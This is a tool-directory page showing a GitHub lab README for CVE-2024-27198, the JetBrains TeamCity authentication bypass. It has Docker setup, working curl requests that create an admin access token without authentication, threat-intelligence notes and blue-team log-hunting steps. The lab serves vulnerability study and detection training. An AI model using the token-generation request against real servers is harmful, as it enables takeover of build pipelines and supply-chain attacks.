Skip to content
KitploitKITPLOIT
도구익스플로잇블로그
Log in
제출
도구익스플로잇블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2024-27198_Lab — Lab for the CVE-2024-27198 | Kitploit
도구/GitHubGitHub/cmpnn-romain/cve-2024-27198_lab
Vulnerability AnalysisExploitationWeb Application ExploitationCTFPenetration TestingThreat IntelligenceIntrusion DetectionLearning & EducationIncident ResponseLog AnalysisLabs & Practice
1715일 전아직 검토되지 않음
GitHub
cmpnn-romain/cve-2024-27198_lab

CVE-2024-27198_Lab

Lab for the CVE-2024-27198

저장소 보기

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
요청한 언어로 콘텐츠를 사용할 수 없습니다. 영어 버전을 표시합니다.


CVE-2024-27198_Lab

Vulnerability Research & Purple Team Demonstration Lab for JetBrains TeamCity Authentication Bypass (CVE-2024-27198)

Table of Contents

  • About The Project
    • CVE Details
    • Built With
  • Threat Intelligence & OSINT
    • Real-World Impact & Exploitation
    • Why this CVE is Critical
  • Getting Started
    • Prerequisites
    • Installation & Lab Setup
  • Steps to Reproduce & Exploit
    • Login Portal
    • Test the Vulnerability
    • Generate Admin Token
    • Verify Token
    • Delete the Token
    • Blue Team: Hunting for IoCs in Logs
    • Stop the Containers
  • Mitigation & Detection
    • Technical Analysis (CWE-288)
    • Indicators of Compromise (IoCs)
    • Log Detection (Sigma Rule)
    • SIEM Live Demo (Blue Team)
    • Remediation
    • Network Detection (Suricata / Snort Rule)
    • Test the Patched Version
  • Links

About The Project

TeamCity provides an admin-only page for token management that is not protected by authentication. This allows an unauthenticated user to generate an access token for the admin user if they can find an ID of an existing user.

This repository contains a complete reproducible Dockerized lab with both vulnerable (:8111) and patched (:8112) TeamCity environments, automated exploitation scripts (exploit.py), Blue Team log-hunting walkthroughs, and a live SIEM event simulator (siem_simulator.py).

CVE Details

  • CVE ID: CVE-2024-27198
  • CWE: CWE-288 (Authentication Bypass Using an Alternate Path or Channel)
  • CNA: JetBrains s.r.o.
  • Base Score: 9.8 CRITICAL
  • Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    • AV:N — Network
    • AC:L — Low
    • PR:N — None
    • UI:N — None
    • S:U — Unchanged
    • C:H — High
    • I:H — High
    • A:H — High

Built With

  • Docker
  • Python
  • JetBrains TeamCity
  • Sigma
  • Suricata

Threat Intelligence & OSINT

Real-World Impact & Exploitation

  • CISA KEV Catalog: Added on March 7, 2024, confirming active exploitation in the wild.
  • Threat Actors: Exploited by multiple ransomware groups and APTs, notably the BianLian ransomware group and the Jasmin ransomware variant. Attackers used this bypass to create rogue administrator accounts, deploy malicious plugins, and execute arbitrary code (RCE) to move laterally within victim networks.
  • Target Profile: CI/CD pipelines are high-value targets (Supply Chain Attacks). Compromising TeamCity allows attackers to inject malicious code into software builds, steal source code, and extract deployment secrets (AWS keys, certificates).

Why this CVE is Critical

The vulnerability lies in the REST API routing mechanism. By appending specific characters (like ?jsp=/app/rest/...;.jsp) to an unauthenticated endpoint, attackers can trick the TeamCity web server into routing the request to an authenticated endpoint while bypassing the security filters. This requires zero prior knowledge or access, making it a pure 9.8 CVSS.

Getting Started

To get a local copy of this lab up and running follow these simple example steps.

Prerequisites

  • Docker & Docker Compose
  • Python 3.10+
  • curl

Installation & Lab Setup

  1. Clone the repo
    git clone [email protected]:cmpnn-romain/CVE-2024-27198_Lab.git
    
  2. Change directory
    cd CVE-2024-27198_Lab
    
  3. Start the containers
    docker compose up -d
    
  • Access the vulnerable TeamCity instance at: http://localhost:8111
  • Access the patched TeamCity instance at: http://localhost:8112

Steps to Reproduce & Exploit

Login Portal

Username:

admin

Password:

admin

Test the vulnerability

GET request for a resource without authentication:

curl -i http://localhost:8111/app/rest/users
curl -i http://localhost:8112/app/rest/users

Both should return an error with 401 status code.

Generate a token for admin user

curl -X POST -H "Content-Type: application/json" \
  "http://localhost:8111/hax?jsp=/app/rest/users/id:1/tokens/REDTEAM;.jsp" \
  -d '{"name":"REDTEAM"}'

This should return a token like this (The token is different every time):

eyJ0eXAiOiAiVENWMiJ9.T1AzMHJjY3piNC1QWDlFenpnLXdCUkRuSF84.ZmJlODg3ZDQtNjFmYy00ZGQxLTk2MDAtYmJlYjViZjE4NGFi
curl -X POST -H "Content-Type: application/json" \
  "http://localhost:8112/hax?jsp=/app/rest/users/id:1/tokens/REDTEAM;.jsp" \
  -d '{"name":"REDTEAM"}'

This should return an error with 401 status code because the patched instance does not have the vulnerability.

Verify token

curl -i -H "Authorization: Bearer <TOKEN>" \
  http://localhost:8111/app/rest/users

Should return the list of users.

Delete the token

  1. Go to http://localhost:8111 with admin account.
  2. Click on the profile icon on the top right.
  3. Go to Profile -> Access Tokens.
  4. You will see the "REDTEAM" token.
  5. Simply click Delete next to the token.

Blue Team: Hunting for IoCs in Logs (The Stealth Factor)

During the demonstration on the lab, you can show a massive Blue Team finding: by default, this vulnerability is incredibly stealthy!

  1. Tomcat access logs are disabled by default in the TeamCity Docker image, so the ;.jsp HTTP requests are not logged.
  2. The TeamCity audit log does not log token creation via the REST API.

So how do we catch it? When the attacker cleans up their tracks! When the attacker deletes their rogue token to hide, TeamCity does log that.

Find the attacker covering their tracks in the audit logs:

docker exec teamcity-vulnerable grep "delete_token" /opt/teamcity/logs/teamcity-activities.log

(You will see a log entry indicating that the "REDTEAM" token was deleted).

Stop the containers

docker compose down

Mitigation & Detection

Technical Analysis (CWE-288)

This vulnerability is an instance of CWE-288: Authentication Bypass Using an Alternate Path or Channel. The flaw stems from a path confusion issue between the Tomcat web server and the TeamCity application router. By appending ;.jsp and passing the target REST API endpoint in the jsp= parameter, the initial security filter interprets the request as an unauthenticated request to a public .jsp file (which is allowed). However, the internal router strips the ;.jsp and forwards the request to the restricted /app/rest/ endpoint without enforcing the authentication filter.

도구 다운로드